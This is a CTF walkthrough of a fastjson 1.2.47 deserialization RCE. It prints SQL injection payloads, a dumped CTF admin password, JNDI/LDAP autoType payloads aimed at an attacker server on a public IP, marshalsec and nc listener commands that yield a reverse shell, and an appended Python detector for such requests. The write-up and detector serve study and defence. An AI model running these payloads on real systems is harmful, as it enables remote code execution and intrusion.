2025-01-15 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com) 05/31 Report
In this issue, the editor walks through the analysis of a fastjson deserialization vulnerability. The article is detailed and written from a practitioner's point of view; I hope you get something out of it.
0x01: write in front
After getting the challenge, the first step was to locate the relevant code by auditing the source.
The audit turned up a SQL injection: the dbname parameter is under our control.
Try the injection:
dbName=myapp#' and 1'2 union select name from myapp.user;#
dbName=myapp#' and 1'2 union select pwd from myapp.user;#
The account and password obtained at the injection point are kept as a backup (after switching to the exploit approach, it turned out these credentials were not needed):
Admin
Admin@Rrrr_ctf_asde
Looking back at the code, one import stood out:
io.swagger.annotations.ApiOperation
So the application uses Swagger.
Swagger is an excellent API documentation tool that is widely used in daily work.
Access swagger-ui.html directly.
Swagger brings to mind fastjson, the library that converts Java objects to and from JSON.
It had a string of RCE vulnerabilities reported in 2019, so that is worth checking.
Searching for fastjson online confirms there is an RCE vulnerability.
The following write-up is very detailed and can fairly be called hand-holding:
https://github.com/CaijiOrz/fastjson-1.2.47-RCE
See the following.
This matches the JSON format used by fastjson's deserialization vulnerability well.
Following the write-up, the procedure is as follows.
Step by step: first prepare the CVM and upload the repository files to it.
After a successful upload, do the following.
Test first.
The CVM listens on port 7777.
Execute on the target:
{"name": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "x": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://121.36.19.222:7777/Exploit", "autoCommit": true}}
Inbound traffic is observed on the listener.
Then continue following the document.
cd into the directory and inspect it.
Change the IP in Exploit.java to the CVM's IP.
Compile with javac Exploit.java to get Exploit.class.
Proceed with the following steps.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://121.36.19.222/#Exploit
When it starts successfully, it listens on local port 1389, as shown below.
python -m SimpleHTTPServer 80
nc listens on local port 8888.
Submit the payload:
{"name": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "x": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://121.36.19.222:1389/Exploit", "autoCommit": true}}
Execution succeeds.
A reverse shell comes back successfully.
Execute cat /flag to get the flag shown below.
0x02: summary
In daily practice, I usually use Burp with the fastjson detection script: send a request and check whether the response looks suspicious. If it indicates a vulnerability, try a payload against dnslog to check for a callback, and then dig further.
The above is the editor's analysis of a fastjson deserialization vulnerability. If you have similar questions, the analysis above may help you understand the issue. If you want to learn more, you are welcome to follow the industry information channel.
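The detection side of the summary above, as an added example that is not part of the original article or the linked repository: a small Python scanner that walks JSON request bodies and flags the fastjson autoType markers seen in the payloads in this write-up (an `@type` key, the `java.lang.Class` / `com.sun.rowset.JdbcRowSetImpl` gadget classes, and a `dataSourceName` that points at an LDAP or RMI JNDI lookup). The request bodies, the request ids and the IP address in them are constructed sample data; `classify` and `scan_requests` are names chosen here, not fastjson or Burp APIs. It goes slightly beyond the article by also handling bodies that Python's strict JSON parser rejects, since fastjson accepts looser syntax than json.loads.

```python
import json
import re

# Gadget classes that appear in the payloads above. A finding on any of these is critical.
GADGET_TYPES = {
    "java.lang.Class",
    "com.sun.rowset.JdbcRowSetImpl",
}
# dataSourceName values starting with one of these trigger a JNDI lookup to a remote server.
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")

# Textual fallbacks for bodies that json.loads cannot parse (fastjson is more lenient).
AUTOTYPE_RE = re.compile(r"@type", re.IGNORECASE)
JNDI_RE = re.compile(r"\b(ldaps?|rmi)://", re.IGNORECASE)

RANK = {"clean": 0, "unparseable": 0, "suspicious": 1, "critical": 2}

# Constructed sample request log (request id, JSON body); not taken from the article.
SAMPLE_REQUESTS = [
    ("r1", '{"name": "alice", "age": 30}'),
    ("r2", '{"name": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, '
           '"x": {"@type": "com.sun.rowset.JdbcRowSetImpl", '
           '"dataSourceName": "ldap://203.0.113.10:1389/Exploit", "autoCommit": true}}'),
    ("r3", '{"items": [{"@type": "java.lang.Class", "val": "java.lang.String"}]}'),
    ("r4", "not json at all"),
    ("r5", '{"x": {"@type": "com.example.Safe", "dataSourceName": "jdbc:mysql://db/app"}}'),
]


def _walk(node, path, findings):
    """Recursively inspect a parsed JSON document, appending (severity, message) findings."""
    if isinstance(node, dict):
        type_name = node.get("@type")
        if type_name is not None:
            if type_name in GADGET_TYPES:
                findings.append(("critical", f"{path}: @type={type_name} is a known fastjson gadget class"))
            else:
                # Any client-supplied @type is an autoType request and deserves review.
                findings.append(("suspicious", f"{path}: @type={type_name} (autoType key present)"))
        val = node.get("val")
        if isinstance(val, str) and val in GADGET_TYPES:
            findings.append(("critical", f"{path}: val={val} loads a gadget class via java.lang.Class"))
        dsn = node.get("dataSourceName")
        if isinstance(dsn, str) and dsn.lower().startswith(JNDI_SCHEMES):
            findings.append(("critical", f"{path}: dataSourceName triggers a JNDI lookup to {dsn}"))
        for key, child in node.items():
            _walk(child, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for index, child in enumerate(node):
            _walk(child, f"{path}[{index}]", findings)


def classify(body: str):
    """Return (severity, findings) for one request body."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        # Strict parse failed; do not pass the body as clean just because it is not strict JSON.
        if AUTOTYPE_RE.search(body) or JNDI_RE.search(body):
            findings.append(("suspicious", "$: autoType key or JNDI URL in a body that is not strict JSON"))
            return "suspicious", findings
        return "unparseable", findings
    _walk(doc, "$", findings)
    level = "clean"
    for severity, _ in findings:
        if RANK[severity] > RANK[level]:
            level = severity
    return level, findings


def scan_requests(requests):
    """Classify every (request id, body) pair; returns {id: (severity, findings)}."""
    return {request_id: classify(body) for request_id, body in requests}


if __name__ == "__main__":
    for request_id, (severity, findings) in scan_requests(SAMPLE_REQUESTS).items():
        print(request_id, severity)
        for _, message in findings:
            print("   ", message)
```

Run against web server access logs or a Burp export, the "critical" hits are the ones to triage first; "suspicious" hits with an unfamiliar `@type` are worth a look because autoType should normally not be reachable from user input at all.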